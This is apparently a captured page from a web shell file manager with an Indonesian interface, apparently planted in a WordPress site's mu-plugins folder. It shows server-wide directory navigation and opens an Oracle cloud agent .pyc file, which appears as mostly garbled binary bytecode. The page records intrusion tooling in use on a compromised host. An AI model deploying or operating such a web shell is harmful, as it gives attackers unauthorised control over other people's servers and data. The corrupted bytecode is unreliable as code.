📂 Advanced File Manager
Multi-Root Navigation System
⚡ Quick Jump
Server (/)
Home (/home)
Var_www (/var/www)
Current (/home4/shelley/public_html/shelleycutler.com/wp-content/mu-plugins)
📍 Go
⬆ Ke Atas
🏠 Root Server
🏠 Root App
🔄 Refresh
📀 /
›
usr
›
libexec
›
oracle-cloud-agent
›
plugins
›
osms
›
oci
›
devops
›
📁 models
📍
Lokasi:
/usr/libexec/oracle-cloud-agent/plugins/osms/oci/devops/models
💾
Free:
45.8 GB
⚠️ Direktori ini
tidak writable
.
✏️ Mengedit: update_vbs_trigger_details.pyc
a N��f� � @ sD d dl mZ ddlmZmZmZ ddlmZ eG dd� de��ZdS )� )�UpdateTriggerDetails� )�formatted_flat_dict� NONE_SENTINEL�#value_allowed_none_or_none_sentinel)�init_model_state_from_kwargsc @ sJ e Zd ZdZdd� Zedd� �Zejdd� �Zdd� Zd d � Z dd� Z d S )�UpdateVbsTriggerDetailsz) Update trigger specific to VBS. c K s` dddddddd�| _ dddd d ddd�| _d | _d | _d | _d | _d | _d | _d | _d| _d S )a� Initializes a new UpdateVbsTriggerDetails object with values from keyword arguments. The default value of the :py:attr:`~oci.devops.models.UpdateVbsTriggerDetails.trigger_source` attribute of this class is ``VBS`` and it should not be changed. The following keyword arguments are supported (corresponding to the getters/setters of this class): :param display_name: The value to assign to the display_name property of this UpdateVbsTriggerDetails. :type display_name: str :param description: The value to assign to the description property of this UpdateVbsTriggerDetails. :type description: str :param trigger_source: The value to assign to the trigger_source property of this UpdateVbsTriggerDetails. :type trigger_source: str :param actions: The value to assign to the actions property of this UpdateVbsTriggerDetails. :type actions: list[oci.devops.models.TriggerAction] :param freeform_tags: The value to assign to the freeform_tags property of this UpdateVbsTriggerDetails. :type freeform_tags: dict(str, str) :param defined_tags: The value to assign to the defined_tags property of this UpdateVbsTriggerDetails. :type defined_tags: dict(str, dict(str, object)) :param connection_id: The value to assign to the connection_id property of this UpdateVbsTriggerDetails. :type connection_id: str �strzlist[TriggerAction]zdict(str, str)zdict(str, dict(str, object)))�display_name�description�trigger_source�actions� freeform_tags�defined_tags� connection_id�displayNamer � triggerSourcer �freeformTags�definedTags�connectionIdN�VBS) � swagger_types� attribute_map� _display_name�_description�_trigger_source�_actions�_freeform_tags� _defined_tags�_connection_id)�self�kwargs� r"